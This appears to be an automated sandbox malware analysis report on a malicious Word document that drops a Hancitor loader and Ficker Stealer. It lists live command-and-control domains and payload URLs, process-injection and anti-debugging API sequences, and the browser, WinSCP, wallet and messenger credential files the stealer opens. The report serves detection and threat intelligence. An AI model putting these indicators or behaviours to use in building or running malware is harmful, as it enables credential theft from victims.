                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: 0708_3355614568218.docStream path 'Data' entropy: 7.97264179911 (max. 8.0)
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2976Thread sleep time: -180000s >= -30000s
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02113400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0212B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02113580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0214E556 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0214E485 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0214E08C push dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02111390 GetProcessHeap,RtlAllocateHeap,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0212B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02129B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0212E1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02133668 SetUnhandledExceptionFilter,__encode_pointer,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0213368A __decode_pointer,SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040115C SetUnhandledExceptionFilter,exit,
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00401150 SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004013C9 SetUnhandledExceptionFilter,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                System process connects to network (likely due to code injection or exploit)Show sources
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pospvisis.com
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 50.19.92.227 80
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.222.42.67 80
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 8.211.241.0 80
                Source: C:\Windows\SysWOW64\rundll32.exeDomain query: sudepallon.com
                Source: C:\Windows\SysWOW64\rundll32.exeDomain query: srand04rf.ru
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.21.211.162 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: api.ipify.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.213.179.67 80
                Contains functionality to inject threads in other processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02113880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02138BC2 cpuid
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\svchost.exeCode function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa,
                Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Documents VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02135256 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02111AA0 GetVersion,wsprintfA,wsprintfA,
                Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected Ficker StealerShow sources
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2716, type: MEMORY
                Tries to harvest and steal Bitcoin Wallet informationShow sources
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Tries to steal Instant Messenger accounts or passwordsShow sources
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

                Remote Access Functionality:

                barindex
                Yara detected Ficker StealerShow sources
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2716, type: MEMORY
                Yara detected HancitorShow sources
                Source: Yara matchFile source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2668, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting22Path InterceptionProcess Injection212Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Scripting22Credentials In Files1System Information Discovery46SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information21NTDSSecurity Software Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 446230 Sample: 0708_3355614568218.doc Startdate: 09/07/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Multi AV Scanner detection for domain / URL 2->38 40 Found malware configuration 2->40 42 15 other signatures 2->42 8 WINWORD.EXE 305 47 2->8         started        process3 file4 22 C:\Users\user\AppData\Local\Temp\nimb.dll, PE32 8->22 dropped 52 Document exploit detected (creates forbidden files) 8->52 12 rundll32.exe 8->12         started        signatures5 process6 process7 14 rundll32.exe 9 12->14         started        dnsIp8 30 sudepallon.com 77.222.42.67, 49166, 49170, 49171 SWEB-ASRU Russian Federation 14->30 32 srand04rf.ru 8.211.241.0, 49167, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 14->32 34 3 other IPs or domains 14->34 54 System process connects to network (likely due to code injection or exploit) 14->54 56 May check the online IP address of the machine 14->56 58 Contains functionality to inject threads in other processes 14->58 18 svchost.exe 13 14->18         started        signatures9 process10 dnsIp11 24 pospvisis.com 95.213.179.67, 49172, 49178, 80 SELECTELRU Russian Federation 18->24 26 23.21.211.162, 49169, 80 AMAZON-AESUS United States 18->26 28 3 other IPs or domains 18->28 44 System process connects to network (likely due to code injection or exploit) 18->44 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->46 48 May check the online IP address of the machine 18->48 50 3 other signatures 18->50 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                0708_3355614568218.doc37%VirustotalBrowse

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                3.2.rundll32.exe.2110000.6.unpack100%AviraTR/Hijacker.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                srand04rf.ru13%VirustotalBrowse
                pospvisis.com12%VirustotalBrowse
                sudepallon.com2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID0%Avira URL Cloudsafe
                http://srand04rf.ru/7hfjsdfjks.exe0%Avira URL Cloudsafe
                http://sudepallon.com/8/forum.php0%Avira URL Cloudsafe
                http://thentabecon.ru/8/forum.php0%Avira URL Cloudsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://anspossthrly.ru/8/forum.php0%Avira URL Cloudsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                elb097307-934924932.us-east-1.elb.amazonaws.com
                50.19.92.227
                truefalse
                  high
                  srand04rf.ru
                  8.211.241.0
                  truetrueunknown
                  pospvisis.com
                  95.213.179.67
                  truetrueunknown
                  sudepallon.com
                  77.222.42.67
                  truetrueunknown
                  api.ipify.org
                  unknown
                  unknownfalse
                    high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://srand04rf.ru/7hfjsdfjks.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    http://api.ipify.org/false
                      high
                      http://sudepallon.com/8/forum.phptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://thentabecon.ru/8/forum.phptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://anspossthrly.ru/8/forum.phptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://api.ipify.org/?format=xmlfalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmpfalse
                          high
                          http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpfalse
                            high
                            http://investor.msn.comrundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpfalse
                              high
                              http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpfalse
                                high
                                http://www.icra.org/vocabulary/.rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmpfalse
                                  high
                                  http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUIDrundll32.exe, 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://investor.msn.com/rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.%s.comPArundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    low
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.hotmail.com/oerundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpfalse
                                      high
                                      http://api.ipify.orgrundll32.exefalse
                                        high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        50.19.92.227
                                        elb097307-934924932.us-east-1.elb.amazonaws.comUnited States
                                        14618AMAZON-AESUSfalse
                                        77.222.42.67
                                        sudepallon.comRussian Federation
                                        44112SWEB-ASRUtrue
                                        8.211.241.0
                                        srand04rf.ruSingapore
                                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                        23.21.211.162
                                        unknownUnited States
                                        14618AMAZON-AESUStrue
                                        95.213.179.67
                                        pospvisis.comRussian Federation
                                        49505SELECTELRUtrue

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:446230
                                        Start date:09.07.2021
                                        Start time:03:06:14
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 5s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:0708_3355614568218.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • GSI enabled (VBA)
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.phis.troj.spyw.expl.evad.winDOC@7/14@7/5
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 6% (good quality ratio 5.8%)
                                        • Quality average: 88.6%
                                        • Quality standard deviation: 21.2%
                                        HCA Information:
                                        • Successful, ratio: 75%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Active ActiveX Object
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                        • HTTP Packets have been reduced
                                        • TCP Packets have been reduced to 100
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        03:07:07API Interceptor1216x Sleep call for process: rundll32.exe modified
                                        03:07:15API Interceptor20x Sleep call for process: svchost.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        50.19.92.22708.jpg.exeGet hashmaliciousBrowse
                                        • api.ipify.org/
                                        triage_dropped_file.dllGet hashmaliciousBrowse
                                        • api.ipify.org/
                                        0701_1866962341645.docGet hashmaliciousBrowse
                                        • api.ipify.org/?format=xml
                                        pGN774GmSs.exeGet hashmaliciousBrowse
                                        • api.ipify.org/?format=xml
                                        file.docGet hashmaliciousBrowse
                                        • api.ipify.org/
                                        file.dllGet hashmaliciousBrowse
                                        • api.ipify.org/
                                        file.dllGet hashmaliciousBrowse
                                        • api.ipify.org/
                                        file.dllGet hashmaliciousBrowse
                                        • api.ipify.org/
                                        trendbanter_v2.apkGet hashmaliciousBrowse
                                        • api.ipify.org/
                                        omh.dllGet hashmaliciousBrowse
                                        • api.ipify.org/
                                        77.222.42.67triage_dropped_file.dllGet hashmaliciousBrowse
                                        • sudepallon.com/8/forum.php
                                        08.jpg.exeGet hashmaliciousBrowse
                                        • sudepallon.com/8/forum.php
                                        0708_5355150121.xllGet hashmaliciousBrowse
                                        • sudepallon.com/8/forum.php
                                        triage_dropped_file.dllGet hashmaliciousBrowse
                                        • mancause.ru/8/forum.php
                                        nimb.dllGet hashmaliciousBrowse
                                        • mancause.ru/8/forum.php
                                        0706_1050501748839.docGet hashmaliciousBrowse
                                        • mancause.ru/8/forum.php
                                        file.dllGet hashmaliciousBrowse
                                        • mancause.ru/8/forum.php
                                        file.docGet hashmaliciousBrowse
                                        • mancause.ru/8/forum.php
                                        file.docGet hashmaliciousBrowse
                                        • mancause.ru/8/forum.php
                                        file.dllGet hashmaliciousBrowse
                                        • mancause.ru/8/forum.php
                                        file.docGet hashmaliciousBrowse
                                        • mancause.ru/8/forum.php

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        srand04rf.rutriage_dropped_file.dllGet hashmaliciousBrowse
                                        • 8.211.241.0
                                        0708_5355150121.xllGet hashmaliciousBrowse
                                        • 8.211.241.0
                                        aCWkTdaR6G.dllGet hashmaliciousBrowse
                                        • 8.209.119.208
                                        0616_433887484261.docGet hashmaliciousBrowse
                                        • 8.209.119.208
                                        omsh.dllGet hashmaliciousBrowse
                                        • 8.209.119.208
                                        omsh_.dllGet hashmaliciousBrowse
                                        • 8.209.119.208
                                        omh.dllGet hashmaliciousBrowse
                                        • 8.209.119.208
                                        0616_1338797754728.docGet hashmaliciousBrowse
                                        • 8.209.119.208
                                        elb097307-934924932.us-east-1.elb.amazonaws.comRUxuwqYQMM.exeGet hashmaliciousBrowse
                                        • 54.235.88.121
                                        1R1aRTRnis.exeGet hashmaliciousBrowse
                                        • 54.243.175.83
                                        triage_dropped_file.dllGet hashmaliciousBrowse
                                        • 54.225.78.40
